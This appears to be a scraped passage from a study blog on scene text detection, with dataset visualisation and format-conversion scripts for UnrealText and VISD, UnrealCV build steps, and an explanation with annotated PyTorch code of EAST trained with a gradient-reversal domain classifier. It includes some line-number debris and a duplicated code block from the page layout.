    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

It seems the data only covers a certain range of lighting and perspective change, and does not adapt very well to the texture of the model surfaces. Non-Latin text is handled with Unicode character encoding.

Visualization

I wrote a bit of code to visualize this dataset, and it looks like the bbox and cbox attributes are exactly the same? (In some datasets, bbox is split by text line while cbox is split by character.)

import cv2
import os
import matplotlib.pyplot as plt
import json
import numpy as np

index = 93

image_dir = r'E:\dataset\UnrealText\sub_103\imgs'
label_dir = r'E:\dataset\UnrealText\sub_103\labels'

image_path = os.path.join(image_dir, str(index) + '.jpg')
label_path = os.path.join(label_dir, str(index) + '.json')

image_origin = cv2.imread(image_path)
image_bbox = image_origin.copy()
image_cbox = image_origin.copy()
height, width, _ = image_origin.shape

with open(label_path, 'r') as f:
    data = json.load(f)

# Draw the word-level polygons ("bbox") together with their transcriptions.
for i, b in enumerate(data['bbox']):
    points = np.array([b[j:j + 2] for j in range(0, len(b), 2)], dtype=np.int32)
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)),
                cv2.FONT_HERSHEY_SIMPLEX, min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

# Draw the character-level polygons ("cbox"); transcriptions are word-level, so no text labels here.
for c in data['cbox']:
    points = np.array([c[j:j + 2] for j in range(0, len(c), 2)], dtype=np.int32)
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    # cv2.putText(image_cbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)),
    #             cv2.FONT_HERSHEY_SIMPLEX, min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('bbox')

axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
axes[2].axis('off')
axes[2].set_title('cbox')

plt.tight_layout()
plt.show()
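To check the bbox-vs-cbox hunch programmatically, the two lists can be compared directly (a quick sketch reusing the data dict loaded above):

# Are the word-level and character-level polygons literally identical in this file?
print('bbox == cbox:', data['bbox'] == data['cbox'])
print('word boxes:', len(data['bbox']), '| char boxes:', len(data['cbox']))

The printed counts make any difference obvious at a glance; in the imgs/15.jpg example above, cbox clearly has more entries than bbox.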


UE demo project


Running

Download the UnrealCV source code from unrealcv/unrealcv at 4.22 (github.com). Versions after 4.16 have no Release downloads, so you have to build it yourself, and be sure to pick the 4.22 branch of the repository, otherwise it will break:


Build the UnrealCV plugin from the command line:

    conda create -n unreal python=3.9
    conda activate unreal
cd <directory of the cloned repository>
    python build.py

The build produces these files:


    BUILD SUCCESSFUL
    AutomationTool exiting with ExitCode=0 (Success)

Download the demo project from Link: DemoProject.tar_5.gz; extract it to get the Demo Project:


In the project's Plugins directory, swap in the UnrealCV plugin built earlier.


    6 Conclusions

    7 Acknowledgement

Project funding acknowledgements.

Dataset visualization

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 987

image_dir = r'D:\dataset\VISD\10K\image'
label_dir = r'D:\dataset\VISD\10K\text'

image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
with open(label_path, 'r') as label_file:
    annotations = label_file.readlines()

for annotation in annotations:
    # Annotation format: x0,y0,x1,y1,x2,y2,x3,y3,transcription
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]  # strip the trailing newline

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)),
                cv2.FONT_HERSHEY_SIMPLEX, min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()
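For reference, each line in a VISD ground-truth .txt is eight comma-separated corner coordinates followed by the transcription, e.g. (a made-up line, not taken from the dataset):

478,188,526,234,526,248,477,203,MARKET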


Converting to a format MindOCR can read

import os
import numpy as np

image_dir = r'D:\dataset\VISD\10K\image'
label_dir = r'D:\dataset\VISD\10K\text'
save_dir = r'D:\dataset\VISD\10K'
save_file = "train_det_gt.txt"

string = ""

for label_name in os.listdir(label_dir):
    print('------', label_name, '------')

    index = int(label_name.split('_')[1].split('.')[0])

    image_file = label_name.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_name)

    with open(label_path, 'r') as label_file:
        annotations = label_file.readlines()

    # One output line per image: "<image file>\t<list of {transcription, points} dicts>"
    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
        annotation_list = annotation.split(',')
        x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
        y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
        points = np.array([x, y], np.int32).T
        transcriptions = annotation_list[-1][:-1]  # strip the trailing newline

        string += '{"transcription": "'
        string += transcriptions
        string += '", "points": ['
        for j, point in enumerate(points):
            string += "["
            string += str(point[0])
            string += ", "
            string += str(point[1])
            if j != len(points) - 1:
                string += "], "
            else:
                string += "]]}"
        if i != len(annotations) - 1:
            string += ", "
    string += ']\n'
    # print(string)

with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
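Each output line thus pairs an image name with a JSON-style list of boxes. Building the list with json.dumps instead of manual concatenation would avoid the bracket bookkeeping; a sketch under the same assumptions (the values shown are hypothetical):

import json

boxes = [{"transcription": "MARKET",
          "points": [[478, 188], [526, 234], [526, 248], [477, 203]]}]
line = '1image_987.jpg' + '\t' + json.dumps(boxes) + '\n'
print(line)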

Contents

Ones that seemed pretty impressive, so I read them more carefully

These each got a standalone post; listing them here as well.

    Paper-Text Recognition in the Wild-A Survey

See: [Paper-Text Recognition in the Wild-A Survey-Zi-Zi's Journey](../../../../2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

Ones my advisor asked me to read

    SEED-Semantics Enhanced Encoder-Decoder Framework for Scene Text Recognition

Resources


Contents

    YOLO9000-Better, Faster, Stronger

    VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations

See: [Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations-Zi-Zi's Journey](../../../../2023/04/05/Paper-VSR-A Unified Framework for Document Layout Analysis combining Vision, Semantics and Relations/)

Ones I want to read

    • HENet: Forcing a Network to Think More for Font Recognition | Papers With Code


      3.2 Adversarial Text Instance Alignment

Inspired by [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org), ATA is adopted to help the network learn domain-invariant features. In the EAST model, the image feature $P(I)$ is the feature-map output of the backbone (i.e., the 384-channel, 1/32-scale feature in Figure 2). To align $P(I)$ between the source and target domains, a domain classifier is used to confuse the feature domains. Concretely, the domain classifier is trained on every input image and predicts which domain the image belongs to (y_pred_prob_f in the code). Let the model's input samples be $x\in X$, where $X$ is some input space, and let $y_i$ be the domain label of the $i$-th training image (y_true in the code), with $y_i=0$ for the source domain and $y_i=1$ for the target domain. With $p_i(x)$ the output of the domain classifier, cross-entropy is used as the loss function:

$$L_d=-\sum_i\left(y_i\ln p_i(x)+(1-y_i)\ln\bigl(1-p_i(x)\bigr)\right)$$

def bce_loss(y_true, y_pred_logits):
    # y_true: ground-truth domain label (0 or 1).
    # y_pred_logits: the model's raw prediction; note the sigmoid below is
    # commented out, so in practice this function receives probabilities.
    # y_pred_prob = F.sigmoid(y_pred_logits)
    # y_true_f = y_true.view(-1)
    # y_true_f = y_true
    y_pred_logits = y_pred_logits.view(-1)
    y_pred_prob_f = y_pred_logits.clamp(min=1e-7, max=1 - 1e-7)  # clamp predictions to [1e-7, 1 - 1e-7] to keep the logs numerically stable
    return -(y_true * y_pred_prob_f.log() + (1. - y_true) * (1 - y_pred_prob_f).log()).mean()  # mean binary cross-entropy
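A quick numeric smoke test of bce_loss (my own check, assuming torch is imported): a target-domain label of 1 against a predicted probability of 0.8 should give -ln(0.8):

import torch

y_true = torch.tensor([1.0])
y_pred = torch.tensor([0.8])
print(bce_loss(y_true, y_pred))  # tensor(0.2231), i.e. -ln(0.8)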

To learn domain-invariant features, the parameters are optimized adversarially: the domain classifier's parameters are optimized by minimizing the domain-classification loss above, while the base network's parameters are optimized by maximizing it. In more detail, a gradient reversal layer (GRL) is inserted between EAST's backbone and the domain classifier; when gradients pass through the GRL, their sign is flipped (the GRL sits between the feature extractor and the domain classifier, so during backpropagation the gradient of the domain-classification loss is automatically negated before it reaches the feature extractor's parameters, yielding a GAN-like adversarial loss). As shown in Figure 2, the feature pyramid network (FPN) and the backbone both minimize EAST's original loss $L_{task}$ during training, where $L_{task}$ denotes EAST's score-map loss and geometry loss. $L^t_{task}$ refers to training on the target domain with pseudo-labels, and $L^s_{task}$ to training on the source domain. The training objectives therefore differ per parameter space:

$$\begin{cases}L_f=\min\bigl(L_{task}^t(\theta_f|x^t)+L_{task}^s(\theta_f|x^s)-\lambda L_d(\theta_f|(x^s,x^t))\bigr)&\theta_f\in F,\\L_d=\min\bigl(L_d(\theta_d|(x^s,x^t))\bigr)&\theta_d\in C,\\L_h=\min\bigl(L_{task}^t(\theta_h|x^t)+L_{task}^s(\theta_h|x^s)\bigr)&\theta_h\in D,\end{cases}$$
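The gradient reversal trick itself is only a few lines in PyTorch. Below is a minimal sketch of my own, not the repository's GradientScalarLayer, though that layer folds the negative constant into the backward pass in the same way:

import torch

class GradReverse(torch.autograd.Function):
    # Identity in the forward pass; multiplies the gradient by -lambd in the backward pass.
    @staticmethod
    def forward(ctx, x, lambd):
        ctx.lambd = lambd
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        # The domain-classification gradient is negated (and scaled) before it
        # reaches the feature extractor's parameters.
        return grad_output.neg() * ctx.lambd, None

def grad_reverse(x, lambd=0.1):
    return GradReverse.apply(x, lambd)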

The target-domain loss module below combines EAST's geometry and score-map losses with the domain loss defined above:

class Loss_target(nn.Module):
    def __init__(self, weight_angle=10):
        # weight_angle: weight of the angle loss within the total loss (default 10).
        super(Loss_target, self).__init__()
        self.weight_angle = weight_angle
        self.bce = bce_loss
        # Binary cross-entropy (bce_loss above), used in forward() for the domain loss.

    def forward(self, gt_score, pred_score, gt_geo, pred_geo, ignored_map, pre_domain):
        if torch.sum(gt_score) < 1:
            # If gt_score sums to less than 1 (no valid targets), return 0 to avoid
            # errors or pointless computation.
            return torch.sum(pred_score + pred_geo) * 0

        classify_loss = get_dice_loss(gt_score, pred_score * (1 - ignored_map))
        # Dice loss for the score map; pred_score * (1 - ignored_map) masks out the
        # regions that should be ignored.

        gt_doamin = torch.Tensor([[[1.]]]).to(torch.device("cuda"))
        doamin_loss = self.bce(gt_doamin, pre_domain)
        # The target-domain label is 1 (moved to the GPU); the BCE domain loss measures
        # how far the predicted domain score is from it.

        iou_loss_map, angle_loss_map = get_geo_loss(gt_geo, pred_geo)

        angle_loss = torch.sum(angle_loss_map * gt_score) / torch.sum(gt_score)
        iou_loss = torch.sum(iou_loss_map * gt_score) / torch.sum(gt_score)
        geo_loss = self.weight_angle * angle_loss + iou_loss
        # get_geo_loss yields IoU and angle loss maps; both are averaged over text
        # pixels and combined with weight_angle into the geometry loss.
        # print('classify loss is {:.8f}, angle loss is {:.8f}, iou loss is {:.8f}'.format(classify_loss, angle_loss, iou_loss))
        return geo_loss, classify_loss, doamin_loss  # geometry, classification, and domain losses

Here $\lambda$ is a trade-off parameter, set to 0.2 in all experiments. By optimizing this loss, the network can learn more domain-invariant text features and transfer better from synthetic to real data.


Figure 2: network architecture with the corresponding optimization objectives. $\theta$ denotes the parameters of EAST. The domain classifier (green) is attached after the feature extractor via a gradient reversal layer, which multiplies the gradient by a negative constant during backpropagation-based training. $L_{task}$ is EAST's original detection loss, and $L_d$ is the domain classifier's loss.

import math
import torch
import torch.nn as nn
import torch.nn.functional as F
# GradientScalarLayer comes from the repository's gradient-reversal utilities.

cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # configuration list: channel counts, with 'M' marking max-pooling layers


def make_layers(cfg, batch_norm=False):
    layers = []  # collects the created layers
    in_channels = 3  # 3 input channels for RGB images
    for v in cfg:
        if v == 'M':  # 'M' adds a 2x2 max-pooling layer
            layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        else:  # otherwise add a conv layer, optionally followed by batch norm, then ReLU
            conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
            if batch_norm:
                layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
            else:
                layers += [conv2d, nn.ReLU(inplace=True)]
            in_channels = v  # the next layer's input channels equal this layer's output channels
    return nn.Sequential(*layers)  # pack all layers into a sequential container


class VGG(nn.Module):
    def __init__(self, features):
        super(VGG, self).__init__()
        self.features = features  # the convolutional layers
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7))  # adaptive average pooling to a 7x7 feature map
        self.classifier = nn.Sequential(
            nn.Linear(512 * 7 * 7, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(True),
            nn.Dropout(),
            nn.Linear(4096, 1000),
        )  # fully connected classifier head with ReLU activations and Dropout

        for m in self.modules():  # weight initialization
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        x = self.features(x)  # run the convolutional layers
        x = self.avgpool(x)  # pool the feature map to 7x7
        x = x.view(x.size(0), -1)  # flatten for the fully connected layers
        x = self.classifier(x)  # final classification prediction
        return x


class extractor(nn.Module):  # feature extraction layer
    def __init__(self, pretrained):
        super(extractor, self).__init__()
        vgg16_bn = VGG(make_layers(cfg, batch_norm=True))  # VGG16 with batch normalization
        if pretrained:
            # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
            # vgg16_bn.load_state_dict(state_dict)
            if pretrained:  # if pretrained is True, load weights from a local path
                vgg16_bn.load_state_dict(torch.load(
                    '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
        self.features = vgg16_bn.features  # keep only VGG16's convolutional part for feature extraction

    def forward(self, x):
        out = []
        for m in self.features:  # pass the input through each layer in turn
            x = m(x)
            if isinstance(m, nn.MaxPool2d):  # record the output of every max-pooling layer
                out.append(x)
        return out[1:]  # return the feature maps from the second pooling layer onward, matching what the merge branch expects


class merge(nn.Module):  # EAST's core feature-merging branch: progressively upsamples and fuses feature maps from different scales into the final output feature map, as in detection/segmentation feature fusion
    def __init__(self):
        super(merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        self.conv3 = nn.Conv2d(384, 64, 1)
        self.bn3 = nn.BatchNorm2d(64)
        self.relu3 = nn.ReLU()
        self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn4 = nn.BatchNorm2d(64)
        self.relu4 = nn.ReLU()

        self.conv5 = nn.Conv2d(192, 32, 1)
        self.bn5 = nn.BatchNorm2d(32)
        self.relu5 = nn.ReLU()
        self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn6 = nn.BatchNorm2d(32)
        self.relu6 = nn.ReLU()

        self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn7 = nn.BatchNorm2d(32)
        self.relu7 = nn.ReLU()

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        # F.interpolate: bilinearly upsample the feature map to a larger spatial resolution.
        # torch.cat: concatenate the upsampled map with a skip feature along the channel
        # dimension to combine information from different scales.
        y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[2]), 1)
        y = self.relu1(self.bn1(self.conv1(y)))
        y = self.relu2(self.bn2(self.conv2(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[1]), 1)
        y = self.relu3(self.bn3(self.conv3(y)))
        y = self.relu4(self.bn4(self.conv4(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[0]), 1)
        y = self.relu5(self.bn5(self.conv5(y)))
        y = self.relu6(self.bn6(self.conv6(y)))

        y = self.relu7(self.bn7(self.conv7(y)))
        return y


class output(nn.Module):  # output head
    def __init__(self, scope=512):
        super(output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1)  # 1x1 convs with different output channels produce the different prediction maps
        self.sigmoid1 = nn.Sigmoid()  # sigmoids turn each conv output into probabilities

        # self.conv1_1 = nn.Conv2d(32, 1, 1)
        # self.sigmoid1_1 = nn.Sigmoid()

        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = 512  # scale factor for the location predictions (hard-coded to 512; the scope argument is ignored)

        # GRL domain classifier
        # self.gap = nn.AdaptiveAvgPool2d(1)
        # self.sigmoid_gap = nn.Sigmoid()
        # self.GRL = RevGrad()
        # self.conv_gap = nn.Conv2d(32, 1, 1)

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')  # Kaiming-normal conv weights, zero biases
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)

    def forward(self, x):
        # score_1 = self.GRL(x)
        # grl = self.sigmoid_gap(self.conv_gap(score_1))

        # domain_feature = self.gap(self.GRL(C[3]))
        # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

        score = self.sigmoid1(self.conv1(x))  # first conv output through sigmoid: the score map
        loc = self.sigmoid2(self.conv2(x)) * self.scope  # second conv output, scaled: the location predictions
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi  # third conv output, shifted and scaled: the angle prediction
        geo = torch.cat((loc, angle), 1)  # concatenate location and angle into the geometry output
        return score, geo


class DAImgHead(nn.Module):
    """
    Adds a simple image-level domain classifier head.
    """

    def __init__(self):
        """
        Arguments:
            in_channels (int): number of channels of the input feature
            USE_FPN (boolean): whether the FPN feature extractor is used
        """
        super(DAImgHead, self).__init__()

        self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1)  # conv layer: 512 -> 256 channels
        self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1)  # conv layer: 256 -> 1 channel

        for l in [self.conv1_da, self.conv2_da]:  # weights ~ N(0, 0.001), zero biases
            torch.nn.init.normal_(l.weight, std=0.001)
            torch.nn.init.constant_(l.bias, 0)

    def forward(self, x):  # conv1_da -> ReLU -> conv2_da
        t = F.relu(self.conv1_da(x))
        return self.conv2_da(t)


class DAInsHead(nn.Module):
    """
    Adds a simple instance-level domain classifier head.
    """

    def __init__(self):
        """
        Arguments:
            in_channels (int): number of channels of the input feature
        """
        super(DAInsHead, self).__init__()
        self.fc1_da = nn.Linear(2028, 1024)  # fully connected layer: 2028 -> 1024 features
        self.fc2_da = nn.Linear(1024, 1024)  # fully connected layer: 1024 -> 1024 features
        self.fc3_da = nn.Linear(1024, 1)  # fully connected layer: 1024 -> 1 feature
        for l in [self.fc1_da, self.fc2_da]:  # fc1/fc2 weights ~ N(0, 0.01), fc3 ~ N(0, 0.05), zero biases
            nn.init.normal_(l.weight, std=0.01)
            nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.fc3_da.weight, std=0.05)
        nn.init.constant_(self.fc3_da.bias, 0)

    def forward(self, x):  # fc1 -> ReLU -> dropout(0.5) -> fc2 -> ReLU -> dropout(0.5) -> fc3
        x = F.relu(self.fc1_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = F.relu(self.fc2_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = self.fc3_da(x)
        return x


class DomainAdaptationModule(torch.nn.Module):
    """
    Module for the domain adaptation component: processes image features so the model
    adapts better across domains. Takes feature maps from the backbone plus instance
    feature vectors, domain labels and proposals. Works for both FPN and non-FPN setups.
    """

    def __init__(self):
        super(DomainAdaptationModule, self).__init__()

        self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7)  # 7x7 average pooling
        self.gap = nn.AdaptiveAvgPool2d(1)  # global average pooling: one value per channel
        self.sigmoid_gap = nn.Sigmoid()  # squashes values into [0, 1]

        self.grl_img = GradientScalarLayer(-1.0 * 0.1)  # gradient reversal layers: flip gradients in the backward pass so the network learns domain-invariant features
        self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
        self.grl_img_consist = GradientScalarLayer(1.0 * 0.1)  # like grl_img / grl_ins but with a positive scale, for a different (consistency) objective
        self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

        self.imghead = DAImgHead()  # image-level domain classifier head
        self.inshead = DAInsHead()  # instance-level domain classifier head

    def forward(self, img_features):
        """
        Arguments:
            img_features (list[Tensor]): features computed from the images that are used for computing the predictions.
            da_ins_feature (Tensor): instance-level feature vectors
            da_ins_labels (Tensor): domain labels for instance-level feature vectors
            targets (list[BoxList]): ground-truth boxes present in the image (optional)

        Returns:
            losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict.
        """
        img_grl_fea = self.grl_img(self.gap(img_features))  # globally pool the image-level feature to 1x1, then pass it through the GRL

        da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea))  # classify the reversed feature and squash the score into [0, 1]

        return da_img_features


class EAST(nn.Module):  # EAST inherits from nn.Module, the base class of all PyTorch models
    def __init__(self, pretrained=True):
        super(EAST, self).__init__()
        self.extractor = extractor(pretrained)  # feature extractor (VGG16-based); uses pretrained weights if pretrained=True
        self.merge = merge()  # feature-merging module that fuses the extracted features
        self.output = output()  # output module that produces the final predictions

        self.DomainAdaptation = DomainAdaptationModule()  # domain adaptation module that adapts features across data distributions

    def forward(self, x):  # forward defines how the input x flows through the network
        C = self.extractor(x)  # extract features; C is a list of feature maps, with C[3] the deepest one
        class_domain = self.DomainAdaptation(C[3])  # run the deepest feature map through the domain adaptation module

        return self.output(self.merge(C)), class_domain
        # self.merge(C): fuse the multi-scale features.
        # self.output(self.merge(C)): produce the final detection predictions from the fused features.
        # Returns both the detection outputs and the domain classifier output.
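A quick shape check of the forward pass (a sketch; it assumes the repository's GradientScalarLayer and the definitions above are importable, and uses pretrained=False so no local weight file is needed):

model = EAST(pretrained=False)
dummy = torch.randn(1, 3, 256, 256)
(score, geo), class_domain = model(dummy)
print(score.shape, geo.shape, class_domain.shape)
# expected: [1, 1, 64, 64], [1, 5, 64, 64], [1, 1, 1, 1] for a 256x256 input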
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        cfg = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']  # 配置列表,指定网络层的类型和数量。

        def make_layers(cfg, batch_norm=False):
        layers = [] # 列表用于存储创建的层。
        in_channels = 3 # 初始化为 3,对应输入图像的通道数。
        for v in cfg:
        if v == 'M': # 如果值为 'M',添加一个 2x2 的最大池化层。
        layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        else: # 否则,创建一个卷积层(nn.Conv2d),后跟可选的批归一化层和 ReLU 激活函数。
        conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
        if batch_norm:
        layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
        else:
        layers += [conv2d, nn.ReLU(inplace=True)]
        in_channels = v # 更新 in_channels 为当前卷积层的输出通道数 v。
        return nn.Sequential(*layers) # 使用 nn.Sequential 将所有层打包成一个顺序容器,返回构造好的网络层。


        class VGG(nn.Module):
        def __init__(self, features):
        super(VGG, self).__init__()
        self.features = features # self.features:存储卷积层。
        self.avgpool = nn.AdaptiveAvgPool2d((7, 7)) # 自适应平均池化层,将特征图大小调整为 7x7。
        self.classifier = nn.Sequential(
        nn.Linear(512 * 7 * 7, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 4096),
        nn.ReLU(True),
        nn.Dropout(),
        nn.Linear(4096, 1000),
        ) # 全连接层的序列,包括两个 ReLU 激活层和 Dropout 层,用于分类。

        for m in self.modules(): # 初始化权重
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.Linear):
        nn.init.normal_(m.weight, 0, 0.01)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        x = self.features(x) # 通过 self.features 处理输入 x。
        x = self.avgpool(x) # 应用自适应平均池化,将特征图调整为 7x7。
        x = x.view(x.size(0), -1) # 将池化后的特征图展平,以适应全连接层输入。
        x = self.classifier(x) # 通过 self.classifier 进行最终的分类预测。
        return x


        class extractor(nn.Module): # 特征提取层。
        def __init__(self, pretrained):
        super(extractor, self).__init__()
        vgg16_bn = VGG(make_layers(cfg, batch_norm=True)) # 使用 VGG 类创建带有批量归一化的 VGG16 网络。
        if pretrained:
        # state_dict = load_state_dict_from_url('https://download.pytorch.org/models/vgg16-397923af.pth')
        # vgg16_bn.load_state_dict(state_dict)
        if pretrained: # 如果 pretrained 为 True,则加载本地路径的预训练权重。
        vgg16_bn.load_state_dict(torch.load(
        '/data/data_weijiawu/Sence_Text_detection/Paper-ACCV/baseline/EAST_1/vgg16_bn-6c64b313.pth'))
        self.features = vgg16_bn.features # self.features 被设置为 VGG16 网络的卷积层部分。(使用 VGG16 进行特征提取)

        def forward(self, x):
        out = []
        for m in self.features: # 遍历 self.features 中的每一层,对输入 x 进行逐层处理。
        x = m(x)
        if isinstance(m, nn.MaxPool2d): # 将每个最大池化层的输出保存到 out 列表中。
        out.append(x)
        return out[1:] # 返回 out[1:],即从第二个池化层开始的特征图。这通常是为了匹配特定的特征提取需求。
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
